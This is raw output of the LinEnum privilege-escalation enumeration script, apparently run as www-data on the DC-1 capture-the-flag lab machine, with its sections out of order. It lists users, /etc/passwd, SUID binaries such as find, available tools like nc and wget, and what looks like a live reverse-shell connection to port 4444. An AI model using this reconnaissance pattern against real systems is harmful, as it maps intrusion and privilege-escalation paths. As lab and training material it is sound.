-rwxr-xr-x 1 root root 995 Oct 16 2012 motd
-rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh
-rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh
-rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh
-rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh
-rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql
-rwxr-xr-x 1 root root 4322 Mar 14 2013 networking
-rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common
-rwxr-xr-x 1 root root 1346 May 20 2012 procps
-rwxr-xr-x 1 root root 6120 Oct 16 2012 rc
-rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local
-rwxr-xr-x 1 root root 117 Oct 16 2012 rcS
-rwxr-xr-x 1 root root 639 Oct 16 2012 reboot
-rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond
-rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin
-rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind
-rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog
-rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs
-rwxr-xr-x 1 root root 590 Oct 16 2012 single
-rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton
-rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh
-rwxr-xr-x 1 root root 8827 Nov 9 2012 udev
-rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab
-rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs
-rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh
-rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot
-rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom
-rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils
-rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common [00;31m[-] /etc/init/ config file permissions:[00m
total 48
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf
-rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf
-rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf
-rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf
-rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf
-rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf
-rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf
-rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf
-rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf
-rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf [00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 4.0K
drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system /lib/systemd/system:
total 56K
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
-rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service
-rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket
-rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service
-rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket
-rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket
-rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service
-rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service
-rw-r--r-- 1 root root 384 Apr 29 2013 udev.service
-rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service
-rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket /lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket
lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket /lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service
lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service [00;33m### SOFTWARE #############################################[00m
[00;31m[-] MYSQL version:[00m
mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 [00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data [00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl [00;31m[-] Installed compilers:[00m
ii checkpolicy 2.1.8-2 i386 SELinux policy compiler
ii gcc 4:4.7.2-1 i386 GNU C compiler
ii gcc-4.7 4.7.2-5 i386 GNU C compiler
ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)
ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) [00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow [00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs [00;33m[+] Possibly interesting SUID files:[00m
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find [00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf
-rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf
-rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf
-rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
-rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf
-rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf
-rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf
-rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf
-rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf
-rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf
-rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf
-rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
-rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit [00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .
drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. [00;33m### SCAN COMPLETE ####################################[00m [00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.95[00m [-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m [00;33mScan started at:
Tue May 7 01:08:52 AEST 2019
[00m [00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux [00;31m[-] Kernel information (continued):[00m
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1 [00;31m[-] Specific release information:[00m
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/" [00;31m[-] Hostname:[00m
DC-1 [00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data) [00;31m[-] Users that have previously logged onto the system:[00m
Username Port From Latest
root tty1 Thu Feb 28 12:10:51 +1000 2019 [00;31m[-] Who else is logged on:[00m
01:08:52 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(mysql) gid=109(mysql) groups=109(mysql)
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4) [00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash [00;31m[-] Super user account(s):[00m
root [00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 [00;31m[-] Root is allowed to login via SSH:[00m
PermitRootLogin yes [00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env [00;31m[-] Path information:[00m
/usr/local/bin:/usr/bin:/bin [00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash [00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx [00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK 022 [00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512 [00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab /etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rw-r--r-- 1 root root 510 May 10 2018 php5 /etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 633 May 30 2018 apache2
-rwxr-xr-x 1 root root 14985 Oct 24 2014 apt
-rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude
-rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 May 3 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base
-rwxr-xr-x 1 root root 89 May 17 2012 logrotate
-rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db
-rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate
-rwxr-xr-x 1 root root 249 May 26 2012 passwd /etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 907 Jun 19 2012 man-db [00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do. SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# [00;33m### NETWORKING ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98
inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8711 errors:0 dropped:0 overruns:0 frame:0
TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1327204 (1.2 MiB) TX bytes:1104845 (1.0 MiB) lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) [00;31m[-] ARP history:[00m
192.168.16.112 dev eth0 INCOMPLETE [00;31m[-] Nameserver(s):[00m
nameserver 192.168.16.254
nameserver 0.0.0.0 [00;31m[-] Default route:[00m
default via 192.168.16.254 dev eth0 [00;31m[-] Listening TCP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::34190 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -
tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - [00;31m[-] Listening UDP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:59942 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:769 0.0.0.0:* -
udp 0 0 127.0.0.1:801 0.0.0.0:* -
udp 0 0 0.0.0.0:21881 0.0.0.0:* -
udp6 0 0 :::52815 :::* -
udp6 0 0 :::28256 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::769 :::* - [00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]
root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]
root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]
root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]
root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]
root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]
root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]
root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]
root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]
root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]
root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]
root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]
root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]
root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]
root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]
root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]
root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]
root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]
root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]
root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]
root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]
root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]
root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]
root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]
root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]
root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]
root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]
root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]
root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]
root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15]
root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]
root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]
root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]
root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]
root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]
root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]
root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]
root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]
root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]
root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]
root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]
root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]
root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]
root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]
root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]
root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]
root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]
root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]
root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]
root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]
root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon
root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]
root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]
root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w
statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd
root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon
root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]
root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]
root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd
root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5
root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid
root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start
daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd
103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system
www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start
www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start
root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron
root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error
101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m
root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2
root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3
root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4
root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5
root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6
root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]
